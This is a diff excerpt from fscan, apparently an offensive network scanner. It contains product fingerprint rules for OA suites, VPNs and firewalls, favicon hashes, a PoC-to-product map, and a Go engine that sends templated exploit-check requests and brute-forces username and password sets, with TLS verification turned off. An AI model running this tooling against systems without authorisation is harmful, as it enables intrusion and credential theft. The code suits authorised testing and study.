{"万户网络", "code", "(css/css_whir.css)"},
{"Spark_Master", "code", "(Spark Master at)"},
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp)"},
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
{"juniper_vpn", "code", "(welcome.cgi?p=logo|/images/logo_juniper_reversed.gif)"},
{"360主机卫士", "headers", "(zhuji.360.cn)"},
{"Nagios", "headers", "(Nagios Access)"},
{"H3C ER8300", "code", "(ER8300系统管理)"},
{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
{"华为 MCU", "code", "(McuR5-min.js)"},
{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
{"泛微OA", "headers", "(ecology_JSessionid)"},
{"泛微OA", "code", "(/spa/portal/public/index.js)"},
{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
{"360网站卫士", "code", "(360wzb)"},
{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
{"zabbix", "cookie", "(zbx_sessionid)"},
{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA)"},
{"CISCO_VPN", "headers", "(webvpn)"},
{"360站长平台", "code", "(360-site-verification)"},
{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
{"o2security_vpn", "headers", "(client_param=install_active)"},
{"H3C ER3260G2", "code", "(ER3260G2系统管理)"},
{"H3C ICG1000", "code", "(ICG1000系统管理)"},
{"CISCO-CX20", "code", "(CISCO-CX20)"},
{"H3C ER5200", "code", "(ER5200系统管理)"},
{"linksys-vpn-bragap14-parintins", "code", "(linksys-vpn-bragap14-parintins)"},
{"360网站卫士常用前端公共库", "code", "(libs.useso.com)"},
{"H3C ER3100", "code", "(ER3100系统管理)"},
{"H3C-SecBlade-FireWall", "code", "(js/MulPlatAPI.js)"},
{"360webfacil_360WebManager", "code", "(publico/template/)"},
{"Citrix_Netscaler", "code", "(ns_af)"},
{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
{"H3C ER3260", "code", "(ER3260系统管理)"},
{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
{"exchange", "code", "(/owa/auth.owa)"},
{"Spark_Worker", "code", "(Spark Worker at)"},
{"H3C ER3108G", "code", "(ER3108G系统管理)"},
{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
{"Citrix-ConfProxy", "code", "(confproxy)"},
{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
{"华为HUAWEI安全设备", "code", "(sweb-lib/resource/)"},
{"华为HUAWEIUSG", "code", "(UI_component/commonDefine/UI_regex_define.js)"},
{"H3C ER6300", "code", "(ER6300系统管理)"},
{"华为_HUAWEI_ASG2100", "code", "(HUAWEI ASG2100)"},
{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
{"H3C ER2100", "code", "(ER2100系统管理)"},
{"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
{"jira", "code", "(jira.webresources)"},
{"金和协同管理平台", "code", "(金和协同管理平台)"},
{"Citrix-NetScaler", "code", "(NS-CACHE)"},
{"linksys-vpn", "headers", "(linksys-vpn)"},
{"通达OA", "code", "(/static/images/tongda.ico|http://www.tongda2000.com|通达OA移动版)"},
{"华为HUAWEISecoway设备", "code", "(Secoway)"},
{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
{"H3C ER2100n", "code", "(ER2100n系统管理)"},
{"H3C ER8300G2", "code", "(ER8300G2系统管理)"},
{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js)"},
{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
{"Jboss", "headers", "(JBoss)"},
{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
{"ThinkPHP", "headers", "(ThinkPHP)"},
{"ThinkPHP", "code", "(/Public/static/js/)"},
{"weaver-ebridge", "code", "(e-Bridge,http://wx.weaver)"},
{"Laravel", "headers", "(laravel_session)"},
{"DWR", "code", "(dwr/engine.js)"},
{"swagger_ui", "code", "(swagger-ui/css|\"swagger\":|swagger-ui.min.js)"},
{"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"},
{"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"},
{"Jenkins", "code", "(Jenkins)"},
{"红帆OA", "code", "(iOffice)"},
{"VMware vSphere", "code", "(VMware vSphere)"},
{"打印机", "code", "(打印机|media/canon.gif)"},
{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
}
var Md5Datas = []Md5Data{
{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
{"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
{"致远OA", "57f307ad3764553df84e7b14b7a85432"},
{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
{"SprintBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
{"通达OA", "ed0044587917c76d08573577c8b72883"},
{"泛微OA", "41eca7a9245394106a09b2534d8030df"},
{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
{"GitLab", "85c754581e1d4b628be5b7712c042224"},
{"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
}
var PocDatas = []PocData{
{"致远OA","seeyon"},
{"泛微OA","weaver-oa"},
{"通达OA","tongda"},
{"ThinkPHP","thinkphp"},
{"Nexus","nexus"},
{"齐治堡垒机","qizhi"},
{"weaver-ebridge","weaver-ebridge"},
{"weblogic","weblogic"},
{"zabbix","zabbix"},
{"VMware vSphere","vmware"},
{"Jboss","jboss"},
}

634
WebScan/lib/check.go
View File

@@ -3,6 +3,8 @@ package lib
import (
"embed"
"fmt"
"github.com/google/cel-go/cel"
"github.com/shadow1ng/fscan/WebScan/info"
"github.com/shadow1ng/fscan/common"
"math/rand"
"net/http"
@@ -29,18 +31,14 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
var wg sync.WaitGroup
for i := 0; i < workers; i++ {
go func() {
wg.Add(1)
for task := range tasks {
isVul, err := executePoc(task.Req, task.Poc)
if err != nil {
continue
}
isVul, _ := executePoc(task.Req, task.Poc)
if isVul {
result := fmt.Sprintf("%s %s", task.Req.URL, task.Poc.Name)
result := fmt.Sprintf("[+] %s %s", task.Req.URL, task.Poc.Name)
common.LogSuccess(result)
}
wg.Done()
}
wg.Done()
}()
}
for _, poc := range LoadMultiPoc(Pocs, pocname) {
@@ -48,35 +46,49 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
Req: req,
Poc: poc,
}
wg.Add(1)
tasks <- task
}
close(tasks)
wg.Wait()
close(tasks)
}
func executePoc(oReq *http.Request, p *Poc) (bool, error) {
c := NewEnvOption()
c.UpdateCompileOptions(p.Set)
if len(p.Sets) > 0 {
setMap := make(map[string]string)
for k := range p.Sets {
setMap[k] = p.Sets[k][0]
}
c.UpdateCompileOptions(setMap)
}
env, err := NewEnv(&c)
if err != nil {
fmt.Println("environment creation error: %s\n", err)
//fmt.Printf("environment creation error: %s\n", err)
return false, err
}
req, err := ParseRequest(oReq)
if err != nil {
//fmt.Println("ParseRequest error",err)
return false, err
}
variableMap := make(map[string]interface{})
req, err := ParseRequest(oReq)
if err != nil {
//fmt.Println(err)
return false, err
}
variableMap["request"] = req
// 现在假定set中payload作为最后产出那么先排序解析其他的自定义变量更新map[string]interface{}后再来解析payload
keys := make([]string, 0)
keys1 := make([]string, 0)
for k := range p.Set {
keys = append(keys, k)
if strings.Contains(strings.ToLower(p.Set[k]), "random") && strings.Contains(strings.ToLower(p.Set[k]), "(") {
keys = append(keys, k) //优先放入调用random系列函数的变量
} else {
keys1 = append(keys1, k)
}
}
sort.Strings(keys)
sort.Strings(keys1)
keys = append(keys, keys1...)
for _, k := range keys {
expression := p.Set[k]
if k != "payload" {
@@ -86,7 +98,8 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
}
out, err := Evaluate(env, expression, variableMap)
if err != nil {
//fmt.Println(err)
//fmt.Println(p.Name," poc_expression error",err)
variableMap[k] = expression
continue
}
switch value := out.Value().(type) {
@@ -94,6 +107,8 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
variableMap[k] = UrlTypeToString(value)
case int64:
variableMap[k] = int(value)
case []uint8:
variableMap[k] = fmt.Sprintf("%s", out)
default:
variableMap[k] = fmt.Sprintf("%v", out)
}
@@ -103,68 +118,105 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
if p.Set["payload"] != "" {
out, err := Evaluate(env, p.Set["payload"], variableMap)
if err != nil {
//fmt.Println(p.Name," poc_payload error",err)
return false, err
}
variableMap["payload"] = fmt.Sprintf("%v", out)
}
success := false
for _, rule := range p.Rules {
for k1, v1 := range variableMap {
_, isMap := v1.(map[string]string)
if isMap {
continue
}
value := fmt.Sprintf("%v", v1)
for k2, v2 := range rule.Headers {
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
}
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
}
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
} else {
req.Url.Path = rule.Path
}
// 某些poc没有区分path和query需要处理
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
newRequest.Header = oReq.Header.Clone()
for k, v := range rule.Headers {
newRequest.Header.Set(k, v)
}
resp, err := DoRequest(newRequest, rule.FollowRedirects)
if err != nil {
return false, err
}
variableMap["response"] = resp
// 先判断响应页面是否匹配search规则
if rule.Search != "" {
result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
if result != nil && len(result) > 0 { // 正则匹配成功
for k, v := range result {
variableMap[k] = v
setslen := 0
haspayload := false
var setskeys []string
if len(p.Sets) > 0 {
for _, rule := range p.Rules {
for k := range p.Sets {
if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
if strings.Contains(k, "payload") {
haspayload = true
}
setslen++
setskeys = append(setskeys, k)
continue
}
for k2 := range rule.Headers {
if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
if strings.Contains(k, "payload") {
haspayload = true
}
setslen++
setskeys = append(setskeys, k)
continue
}
}
//return false, nil
} else {
return false, nil
}
}
}
out, err := Evaluate(env, rule.Expression, variableMap)
if err != nil {
return false, err
success := false
if setslen > 0 {
if haspayload {
success, err = clusterpoc1(oReq, p, variableMap, req, env, setskeys)
} else {
success, err = clusterpoc(oReq, p, variableMap, req, env, setslen, setskeys)
}
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
success = false // 如果最后一步执行失败,就算前面成功了最终依旧是失败
break
} else {
for _, rule := range p.Rules {
for k1, v1 := range variableMap {
_, isMap := v1.(map[string]string)
if isMap {
continue
}
value := fmt.Sprintf("%v", v1)
for k2, v2 := range rule.Headers {
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
}
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
}
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
} else {
req.Url.Path = rule.Path
}
// 某些poc没有区分path和query需要处理
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
newRequest.Header = oReq.Header.Clone()
for k, v := range rule.Headers {
newRequest.Header.Set(k, v)
}
resp, err := DoRequest(newRequest, rule.FollowRedirects)
if err != nil {
return false, err
}
variableMap["response"] = resp
// 先判断响应页面是否匹配search规则
if rule.Search != "" {
result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
if result != nil && len(result) > 0 { // 正则匹配成功
for k, v := range result {
variableMap[k] = v
}
//return false, nil
} else {
return false, nil
}
}
out, err := Evaluate(env, rule.Expression, variableMap)
if err != nil {
return false, err
}
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
success = false // 如果最后一步执行失败,就算前面成功了最终依旧是失败
break
}
success = true
}
success = true
}
return success, nil
}
@@ -192,7 +244,8 @@ func newReverse() *Reverse {
letters := "1234567890abcdefghijklmnopqrstuvwxyz"
randSource := rand.New(rand.NewSource(time.Now().Unix()))
sub := RandomStr(randSource, letters, 8)
if ceyeDomain == "" {
if true {
//默认不开启dns解析
return &Reverse{}
}
urlStr := fmt.Sprintf("http://%s.%s", sub, ceyeDomain)
@@ -204,3 +257,446 @@ func newReverse() *Reverse {
IsDomainNameServer: false,
}
}
func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env, slen int, keys []string) (success bool, err error) {
for _, rule := range p.Rules {
for k1, v1 := range variableMap {
if IsContain(keys, k1) {
continue
}
_, isMap := v1.(map[string]string)
if isMap {
continue
}
value := fmt.Sprintf("%v", v1)
for k2, v2 := range rule.Headers {
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
}
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
}
n := 0
for k := range p.Sets {
if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
n++
continue
}
for k2 := range rule.Headers {
if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
n++
continue
}
}
}
if n == 0 {
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == false {
break
}
}
if slen == 1 {
look1:
for _, var1 := range p.Sets[keys[0]] {
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == true {
break look1
}
}
if success == false {
break
}
}
if slen == 2 {
look2:
for _, var1 := range p.Sets[keys[0]] {
for _, var2 := range p.Sets[keys[1]] {
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == true {
break look2
}
}
}
if success == false {
break
}
}
if slen == 3 {
look3:
for _, var1 := range p.Sets[keys[0]] {
for _, var2 := range p.Sets[keys[1]] {
for _, var3 := range p.Sets[keys[2]] {
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[2]+"}}", var3)
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[2]+"}}", var3)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[2]+"}}", var3)
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == true {
break look3
}
}
}
}
if success == false {
break
}
}
}
return success, nil
}
func clusterpoc1(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env, keys []string) (success bool, err error) {
setMap := make(map[string]interface{})
for k := range p.Sets {
setMap[k] = p.Sets[k][0]
}
setMapbak := cloneMap1(setMap)
for _, rule := range p.Rules {
for k1, v1 := range variableMap {
if IsContain(keys, k1) {
continue
}
_, isMap := v1.(map[string]string)
if isMap {
continue
}
value := fmt.Sprintf("%v", v1)
for k2, v2 := range rule.Headers {
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
}
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
}
varset := []string{}
varpay := []string{}
n := 0
for k := range p.Sets {
// 1. 如果rule中需要修改 {{k}} 如username、payload
if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
if strings.Contains(k, "payload") {
varpay = append(varpay, k)
} else {
varset = append(varset, k)
}
n++
continue
}
for k2 := range rule.Headers {
if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
if strings.Contains(k, "payload") {
varpay = append(varpay, k)
} else {
varset = append(varset, k)
}
n++
continue
}
}
}
for _, key := range varpay {
v := fmt.Sprintf("%s", setMap[key])
for k := range p.Sets {
if strings.Contains(v, k) {
if !IsContain(varset, k) && !IsContain(varpay, k) {
varset = append(varset, k)
}
}
}
}
if n == 0 {
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == false {
break
}
}
if len(varset) == 1 {
look1:
// (var1 tomcat ,keys[0] username)
for _, var1 := range p.Sets[varset[0]] {
setMap := cloneMap1(setMapbak)
setMap[varset[0]] = var1
evalset(env, setMap)
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+varset[0]+"}}", var1)
for _, key := range varpay {
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[0]+"}}", var1)
for _, key := range varpay {
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == true {
common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, var1))
break look1
}
}
if success == false {
break
}
}
if len(varset) == 2 {
look2:
// (var1 tomcat ,keys[0] username)
for _, var1 := range p.Sets[varset[0]] { //username
for _, var2 := range p.Sets[varset[1]] { //password
setMap := cloneMap1(setMapbak)
setMap[varset[0]] = var1
setMap[varset[1]] = var2
evalset(env, setMap)
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+varset[0]+"}}", var1)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+varset[1]+"}}", var2)
for _, key := range varpay {
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+varset[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+varset[1]+"}}", var2)
for _, key := range varpay {
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
success, err = clustersend(oReq, variableMap, req, env, rule1)
if err != nil {
return false, err
}
if success == true {
common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, var1, var2))
break look2
}
}
}
if success == false {
break
}
}
if len(varset) == 3 {
look3:
for _, var1 := range p.Sets[keys[0]] {
for _, var2 := range p.Sets[keys[1]] {
for _, var3 := range p.Sets[keys[2]] {
setMap := cloneMap1(setMapbak)
setMap[varset[0]] = var1
setMap[varset[1]] = var2
evalset(env, setMap)
rule1 := cloneRules(rule)
for k2, v2 := range rule1.Headers {
rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[2]+"}}", var3)
for _, key := range varpay {
rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[2]+"}}", var3)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[2]+"}}", var3)
for _, key := range varpay {
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+key+"}}", fmt.Sprintf("%v", setMap[key]))
}
success, err = clustersend(oReq, variableMap, req, env, rule)
if err != nil {
return false, err
}
if success == true {
break look3
}
}
}
}
if success == false {
break
}
}
}
return success, nil
}
func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Request, env *cel.Env, rule Rules) (bool, error) {
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
} else {
req.Url.Path = rule.Path
}
// 某些poc没有区分path和query需要处理
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
newRequest.Header = oReq.Header.Clone()
for k, v := range rule.Headers {
newRequest.Header.Set(k, v)
}
resp, err := DoRequest(newRequest, rule.FollowRedirects)
if err != nil {
return false, err
}
variableMap["response"] = resp
// 先判断响应页面是否匹配search规则
if rule.Search != "" {
result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
if result != nil && len(result) > 0 { // 正则匹配成功
for k, v := range result {
variableMap[k] = v
}
//return false, nil
} else {
return false, nil
}
}
out, err := Evaluate(env, rule.Expression, variableMap)
if err != nil {
return false, err
}
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
return false, err // 如果最后一步执行失败,就算前面成功了最终依旧是失败
}
return true, err
}
func cloneRules(tags Rules) Rules {
cloneTags := Rules{}
cloneTags.Method = tags.Method
cloneTags.Path = tags.Path
cloneTags.Body = tags.Body
cloneTags.Search = tags.Search
cloneTags.FollowRedirects = tags.FollowRedirects
cloneTags.Expression = tags.Expression
cloneTags.Headers = cloneMap(tags.Headers)
return cloneTags
}
func cloneMap(tags map[string]string) map[string]string {
cloneTags := make(map[string]string)
for k, v := range tags {
cloneTags[k] = v
}
return cloneTags
}
func cloneMap1(tags map[string]interface{}) map[string]interface{} {
cloneTags := make(map[string]interface{})
for k, v := range tags {
cloneTags[k] = v
}
return cloneTags
}
func IsContain(items []string, item string) bool {
for _, eachItem := range items {
if eachItem == item {
return true
}
}
return false
}
func evalset(env *cel.Env, variableMap map[string]interface{}) {
for k := range variableMap {
expression := fmt.Sprintf("%v", variableMap[k])
if !strings.Contains(k, "payload") {
out, err := Evaluate(env, expression, variableMap)
if err != nil {
//fmt.Println(err)
variableMap[k] = expression
continue
}
switch value := out.Value().(type) {
case *UrlType:
variableMap[k] = UrlTypeToString(value)
case int64:
variableMap[k] = fmt.Sprintf("%v", value)
case []uint8:
variableMap[k] = fmt.Sprintf("%v", out)
default:
variableMap[k] = fmt.Sprintf("%v", out)
}
}
}
for k := range variableMap {
expression := fmt.Sprintf("%v", variableMap[k])
if strings.Contains(k, "payload") {
out, err := Evaluate(env, expression, variableMap)
if err != nil {
//fmt.Println(err)
variableMap[k] = expression
} else {
variableMap[k] = fmt.Sprintf("%v", out)
}
}
}
}
func CheckInfoPoc(infostr string) string {
for _, poc := range info.PocDatas {
if strings.Compare(poc.Name,infostr) == 0 {
return poc.Alias
}
}
return ""
}

68
WebScan/lib/client.go Normal file
View File

@@ -0,0 +1,68 @@
package lib
import (
"crypto/tls"
"github.com/shadow1ng/fscan/common"
"log"
"net"
"net/http"
"net/url"
"strings"
"time"
)
var (
Client *http.Client
ClientNoRedirect *http.Client
dialTimout = 5 * time.Second
keepAlive = 15 * time.Second
)
func Inithttp(PocInfo common.PocInfo) {
//PocInfo.Proxy = "http://127.0.0.1:8080"
err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
if err != nil {
log.Fatal(err)
}
}
func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
dialer := &net.Dialer{
Timeout: dialTimout,
KeepAlive: keepAlive,
}
tr := &http.Transport{
DialContext: dialer.DialContext,
MaxConnsPerHost: 0,
MaxIdleConns: 0,
MaxIdleConnsPerHost: ThreadsNum * 2,
IdleConnTimeout: keepAlive,
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
TLSHandshakeTimeout: 5 * time.Second,
DisableKeepAlives: false,
}
if DownProxy != "" {
if DownProxy == "1" {
DownProxy = "http://127.0.0.1:8080"
} else if !strings.Contains(DownProxy, "://") {
DownProxy = "http://127.0.0.1:" + DownProxy
}
u, err := url.Parse(DownProxy)
if err != nil {
return err
}
tr.Proxy = http.ProxyURL(u)
}
Client = &http.Client{
Transport: tr,
Timeout: Timeout,
}
ClientNoRedirect = &http.Client{
Transport: tr,
Timeout: Timeout,
CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse },
}
return nil
}

146
WebScan/lib/eval.go
View File

@@ -2,6 +2,7 @@ package lib
import (
"bytes"
"compress/gzip"
